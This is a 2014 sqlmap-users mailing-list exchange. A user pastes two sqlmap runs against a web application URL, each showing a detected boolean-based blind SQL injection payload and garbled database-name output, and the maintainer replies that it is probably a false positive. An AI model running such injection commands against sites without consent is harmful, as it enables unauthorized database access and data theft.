Re: [sqlmap-users] SQLMap extracts weird chars
Brought to you by:
inquisb
From: Miroslav S. <mir...@gm...> - 2014-05-03 21:09:44
|
Hi. Most probably a false positive. Bye On Sat, May 3, 2014 at 11:02 PM, Dev <124...@qq...> wrote: > I can't figure out why this happens > > > > > root@pk:~# sqlmap -u "http://www.net/m_view.php?ps_db=notice&ps_boid=149" > --current-db > > sqlmap/1.0-dev-b54651b - automatic SQL injection and database takeover > tool > http://sqlmap.org > > [*] starting at 05:58:05 > > [05:58:05] [INFO] resuming back-end DBMS 'mysql' > [05:58:05] [INFO] testing connection to the target URL > sqlmap identified the following injection points with a total of 0 HTTP(s) > requests: > --- > Place: GET > Parameter: ps_boid > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause > Payload: ps_db=notice&ps_boid=149) AND 4099=4099 AND (2004=2004 > --- > [05:58:14] [INFO] the back-end DBMS is MySQL > web application technology: PHP 4.4.9, Apache > back-end DBMS: MySQL 4 > [05:58:14] [INFO] fetching current database > [05:58:14] [INFO] resumed: \\?9e\\?9e\\?9e\\?9e\\?9e\\?9e\\?9e > current database: '\?9e\?9e\?9e\?9e\?9e\?9e\?9e' > [05:58:14] [INFO] fetched data logged to text files under > '/usr/share/sqlmap/output/www.net' > > [*] shutting down at 05:58:14 > > root@pk:~# sqlmap -u "http://www.net/m_view.php?ps_db=notice&ps_boid=149" > --current-db > > sqlmap/1.0-dev-b54651b - automatic SQL injection and database takeover > tool > http://sqlmap.org > > [!] legal disclaimer: Usage of sqlmap for attacking targets without prior > mutual consent is illegal. It is the end user's responsibility to obey all > applicable local, state and federal laws. Developers assume no liability > and are not responsible for any misuse or damage caused by this program > > [*] starting at 05:59:17 > > [05:59:17] [INFO] resuming back-end DBMS 'mysql' > [05:59:17] [INFO] testing connection to the target URL > sqlmap identified the following injection points with a total of 0 HTTP(s) > requests: > --- > Place: GET > Parameter: ps_boid > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause > Payload: ps_db=notice&ps_boid=149) AND 4099=4099 AND (2004=2004 > --- > [05:59:18] [INFO] the back-end DBMS is MySQL > web application technology: PHP 4.4.9, Apache > back-end DBMS: MySQL 4 > [05:59:18] [INFO] fetching current database > [05:59:18] [INFO] resumed: \\?9e\\?9e\\?9e\\?9e\\?9e\\?9e\\?9e > current database: '\?9e\?9e\?9e\?9e\?9e\?9e\?9e' > [05:59:18] [INFO] fetched data logged to text files under > '/usr/share/sqlmap/output/www.net' > > [*] shutting down at 05:59:18 > > root@pk:~# > > > > > ------------------------------------------------------------------------------ > "Accelerate Dev Cycles with Automated Cross-Browser Testing - For FREE > Instantly run your Selenium tests across 300+ browser/OS combos. Get > unparalleled scalability from the best Selenium testing platform available. > Simple to use. Nothing to install. Get started now for free." > http://p.sf.net/sfu/SauceLabs > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |